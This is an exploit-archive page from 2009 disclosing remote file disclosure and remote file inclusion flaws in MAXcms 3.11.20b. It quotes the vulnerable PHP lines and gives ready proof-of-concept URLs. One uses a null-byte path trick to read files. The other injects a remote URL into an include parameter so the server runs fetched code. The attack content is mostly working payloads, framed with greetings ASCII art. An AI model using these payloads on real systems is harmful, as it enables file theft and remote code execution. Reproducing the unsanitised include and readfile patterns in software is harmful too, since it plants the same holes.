[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities
# Published : 2009-08-03
# Author : GoLd_M
# Previous Title : Discloser 0.0.4-rc2 (index.php more) SQL Injection Vulnerability
# Next Title : Payment Processor Script (shop.htm cid) SQL Injection Vulnerability


MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities
I- Remote File Disclosure Vulnerabilities
In /includes/inc.thcms_admin_dirtree.php (Code)
22: if ($_GET["getjs"]=="1") {  <<-------!!
23:    readfile($thCMS_root."/includes/wz_dragdrop.js");<<-------!!
24:    exit;
25: }
POC :
     http://localhost//microcms/includes/inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=inc.thcms_admin_dirtree.php%00
                                              #####################
II- Remote File Inclusion Vulnerabilities
In /includes/file_manager/special.php (Code)
01: <?php
02: /**
03: *    Hier wird $af_pk ??bergeben.
04: *    Das ist die PK aus der Tabelle adovo_filedata auf den einen Datensatz.
05: */
06:
07: include($fm_includes_special); <<-------!!
08:
09: ?>
POC :
     http://localhost//microcms/includes/file_manager/special.php?fm_includes_special=http://localhost/020.txt

Thanx To

          .___________..______     ____    ____  ___       _______   
           |           ||   _           /   / /        /  _____|  
           `---|  |----`|  |_)  |       /   / /  ^     |  |  __    
               |  |     |      /      _    _/ /  /_    |  | |_ |   
               |  |     |  |  ----.   |  |  /  _____   |  |__| |   
               |__|     | _| `._____|   |__| /__/     __ ______|   
                                                             
       ___       ______     ___       _______   _______ .___  ___. ____    ____   
      /        /      |   /        |        |   ____||   /   |      /   /   
     /  ^     |  ,----'  /  ^      |  .--.  ||  |__   |    /  |     /   /    
    /  /_    |  |      /  /_     |  |  |  ||   __|  |  |/|  |   _    _/     
   /  _____   |  `----./  _____    |  '--'  ||  |____ |  |  |  |     |  |       
  /__/     __ ______/__/     __ |_______/ |_______||__|  |__|     |__|      Tryag.Cc

# www.Syue.com [2009-08-03]